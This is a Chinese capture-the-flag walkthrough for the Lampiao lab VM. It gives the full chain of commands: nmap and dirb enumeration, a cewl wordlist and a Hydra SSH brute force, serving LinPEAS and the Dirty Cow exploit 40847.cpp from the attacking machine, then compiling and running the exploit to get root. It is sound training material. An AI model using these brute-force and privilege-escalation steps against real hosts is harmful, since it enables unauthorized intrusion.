当前位置：首页 > article >正文

Lampiao 靶场

article 2026/5/26 2:47:45

Lampiao 靶场完整渗透解析一、靶场环境信息攻击机KaliIP192.168.146.128靶机 IP192.168.146.129目标获取靶机 root 权限与 flag二、步骤 1信息收集端口与服务扫描nmap -p- -sV 192.168.146.129 -n -T4关键结果22/tcpOpenSSH 6.6.1p1Ubuntu80/tcphttp?状态不确定1898/tcpApache httpd 2.4.7Ubuntu三、步骤 2Web 服务探索1898 端口操作 1访问 1898 端口主页面在浏览器中访问http://192.168.146.129:1898发现这是一个基于 Drupal 搭建的网站左侧存在登录表单页面展示了关于 “Lampião” 的历史文章。操作 2通过Read more按钮探索文章内容点击文章下方的Read more按钮进入文章详情页此时 URL 出现新参数http://192.168.146.129:1898/?qnode/1页面内容为关于 Lampião 的历史介绍未发现直接敏感信息。操作 3修改 URL 参数枚举node路径尝试修改 URL 参数将node/1改为node/2访问http://192.168.146.129:1898/?qnode/2发现页面中包含两个文件audio.m4a和qrc.png。操作 4分析 node/2 页面的文件线索打开audio.m4a录音文件在浏览器中访问http://192.168.146.129:1898/audio.m4a播放后发现音频中明确提到了用户名tiago。打开qrc.png二维码图片在浏览器中访问http://192.168.146.129:1898/qrc.png使用微信扫描后未获取到有效密码信息仅为干扰项。操作 5继续枚举node路径尝试访问node/3路径http://192.168.146.129:1898/?qnode/3页面仅包含一个无有效信息的 mp3 文件未发现新线索。四、步骤 3目录爆破寻找敏感路径dirb http://192.168.146.129:1898关键结果发现目录includes/、misc/、modules/、profiles/、scripts/、sites/、themes/敏感文件index.php、robots.txt、web.config、xmlrpc.php五、步骤 4社工字典生成 SSH 爆破操作 1生成社工字典cewl http://192.168.146.129:1898 -w pass.txt操作 2Hydra 爆破 SSH 密码hydra -l tiago -P pass.txt 192.168.146.129 ssh关键结果账号tiago密码Virgulino六、步骤 5SSH 登录靶机低权限操作命令ssh tiago192.168.146.129 # 输入密码Virgulino id关键结果登录成功用户为tiagouid1000系统信息Ubuntu 14.04.5 LTS内核 4.4.0-31-generic七、步骤 6提权信息收集LinPEAS 脚本操作 1Kali 开启 HTTP 服务python -m http.server 8081操作 2靶机下载脚本并执行wget http://192.168.146.128:8081/aaa.sh chmod x aaa.sh ./aaa.sh关键结果内核版本4.4.0存在 Dirty Cow 提权漏洞系统Ubuntu 14.04架构 i686截图位置八、步骤 7Dirty Cow 提权获取 root 密码操作 1Kali 开启 HTTP 服务8000 端口python -m http.server 8000操作 2靶机下载 Exp 源码wget http://192.168.146.128:8000/40847.cpp操作 3编译 Expg -Wall -pedantic -O2 -stdc11 -pthread -o 40847 40847.cpp -lutil关键结果编译成功生成可执行文件40847截图位置九、步骤 8执行 Dirty Cow Exp获取 root 密码操作命令la -al # 查看当前目录文件 ./40847关键结果成功获取 root 密码dirtyCowFun十、步骤 9登录 root 用户并获取 flag操作命令ssh root192.168.146.129 # 输入密码dirtyCowFun ls cat flag.txt关键结果成功登录 root 用户获取 flag9740616875908d91ddcdaa8aea3af366十一、完整渗透思路总结信息收集nmap 扫描靶机开放端口与服务发现 22/80/1898 端口Web 线索挖掘通过修改 URL 参数枚举 node 路径从 node/2 页面的音频文件中获取用户名tiago目录爆破dirb 爆破 1898 端口目录确认 Drupal 服务结构账号获取cewl 生成社工字典hydra 爆破 SSH 密码拿到 tiago 用户权限提权准备上传 LinPEAS 脚本发现内核 4.4.0 存在 Dirty Cow 漏洞漏洞利用下载并编译 40847.cpp Exp获取 root 密码权限登顶使用 root 密码登录 SSH读取 flag 完成靶场

Lampiao 靶场

相关文章：

Lampiao 靶场

2026年HR招聘偏好白皮书：这5项附加技能出现频率暴涨

30岁裸辞后，我用两个月拿下AI应用认证，现在OFFER选择困难症犯了

Python开发者首次使用Taotoken接入大模型API的完整步骤指南

Visual Paradigm 17.0 团队协作新功能实测：手把手教你用项目模板和文件夹管理提效

Blender渲染通道完全指南：如何像电影后期一样，分离出深度、阴影与反射图

亚马逊卖家公开信息数据提取：反爬攻防战与 Python 批量采集实战

HFSS仿真结果怎么看？以T型波导为例，读懂S参数与电场动态图

从入门到上岗，Java+AI 复合型人才养成攻略

用STM32CubeMX和HAL库快速上手WS2812B：告别手动计算延时，一键生成驱动框架

硬件答辩问题总结

Yokogawa AAI835-H50/K4A00模拟输入/输出模块

告别拍脑袋规划！用ArcGIS做绿道选线：如何科学量化坡度、水域、道路成本并加权计算

Hirschmann RS20-0800M4M4SDAE工业以太网交换机

高性能Windows流媒体服务器部署：5大核心技术与3种实战架构深度解析

C语言双端队列完整实现：一行代码吃透头尾操作，算法效率拉满

从电磁炉到户外电源：拆解单相SVPWM如何让你的逆变器更安静、更高效

ARM PMU外部接口与性能监控寄存器详解

51单片机驱动ST7735S彩屏避坑指南：从5秒刷屏到流畅贪吃蛇的优化实战

【CP-05】RTE运行时环境 - SWC的操作系统接口

软阴影：那个让虚拟世界“温柔起来“的光影小秘密

环境光遮蔽（Ambient Occlusion）：揭秘那个让虚拟世界“有重量感“的阴影魔法

Python 3.7 + XGBoost 多分类实战：从数据清洗到SHAP模型解释的保姆级教程

从理论推导到代码实现：手把手教你用Python/Numpy写出守恒形式的NS方程求解器

Redis沙盒体验：在浏览器中零门槛掌握NoSQL核心技能

网易云音乐NCM转MP3终极指南：ncmdump工具完整使用教程

App Inventor蓝牙调试避坑指南：从连接失败到数据乱码，一次讲清所有常见问题

别再乱算相似度了！用Python实战二元变量聚类：从Jaccard系数到病人分组

UOS系统下WPS卸载不干净？手把手教你用命令行精准清理（附dpkg/apt组合拳）

iPaaS 应用场景深度解析：从系统孤岛到数据自由流动的六大实战路径